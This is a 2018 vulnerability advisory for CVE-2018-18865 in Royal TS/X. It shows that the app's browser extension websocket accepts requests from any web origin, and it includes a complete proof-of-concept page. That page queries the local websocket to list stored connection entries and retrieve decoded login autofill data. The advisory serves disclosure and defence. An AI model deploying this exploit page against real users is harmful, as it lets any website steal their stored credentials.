Title: Royal TS/X - Information Disclosure Author: Jakub Palaczynski Date: 10. July 2018 CVE: CVE-2018-18865 Affected product: ============= Royal TS/X < Royal TS v5 Beta / Royal TSX v4 Beta Vulnerability - Information Disclosure: ============================= Any third party web application can steal credentials created in Royal TS/X when browser extension is enabled. Browser extension communicates using websockets (default TCP port 54890) and websockets do not use any validation to verify origin of the request. PoC website: ========== <!DOCTYPE html> <meta charset="utf-8" /> <title>RoyalTS/X Exploit</title> <script language="javascript" type="text/javascript"> var wsUri = "ws://127.0.0.1:54890/"; var output; function init() { output = document.getElementById("output"); testWebSocket(); } function testWebSocket() { writeToScreen("Let's retrieve some data..."); websocket = new WebSocket(wsUri); websocket.onopen = function(evt) { onOpen(evt,"{\"Command\":\"GetDocuments\",\"Arguments\":null,\"PluginVersion\":\"1.0.0.0\",\"RequestId\":\"aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa\"}") }; websocket.onclose = function(evt) { onClose(evt) }; websocket.onmessage = function(evt) { onMessage(evt) }; websocket.onerror = function(evt) { onError(evt) }; } function onOpen(evt,message) { doSend(message); } function onClose(evt) { } function onMessage(evt) { var obj = JSON.parse(evt.data); if (obj['Command'] == "GetDocuments") { for (var x in obj['ResponseData']){ writeToScreen("Name: " + obj['ResponseData'][x]['Name']); writeToScreen("Unlocked: " + obj['ResponseData'][x]['Unlocked']); for (var y in obj['ResponseData'][x]['Credentials']){ writeToScreen("Username: " + obj['ResponseData'][x]['Credentials'][y]['UserName']); writeToScreen("URL: " + obj['ResponseData'][x]['Credentials'][y]['URL']); if (obj['ResponseData'][x]['Unlocked'] == true){ websocket.close(); websocket = new WebSocket(wsUri); websocket.onopen = function(evt) { onOpen(evt,"{\"Command\":\"GetLoginInformation\",\"Arguments\":{\"CredentialId\":\"" + obj['ResponseData'][x]['Credentials'][y]['ID'] + "\"},\"PluginVersion\":\"1.0.0.0\",\"RequestId\":\"aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa\"}") }; websocket.onclose = function(evt) { onClose(evt) }; websocket.onmessage = function(evt) { onMessage(evt) }; websocket.onerror = function(evt) { onError(evt) }; } } } } else { if (obj['Command'] == "GetLoginInformation") { var obj = JSON.parse(evt.data); writeToScreen("AutoFill Data: " + atob(obj['ResponseData'])); } } } function onError(evt) { writeToScreen('<span style="color: red;">ERROR:</span> ' + evt.data); } function doSend(message) { websocket.send(message); } function writeToScreen(message) { var pre = document.createElement("p"); pre.style.wordWrap = "break-word"; pre.innerHTML = message; output.appendChild(pre); } window.addEventListener("load", init, false); </script> <h2>RoyalTS/X Exploit</h2> <div id="output"></div> Contact: ======= Jakub[dot]Palaczynski[at]gmail[dot]com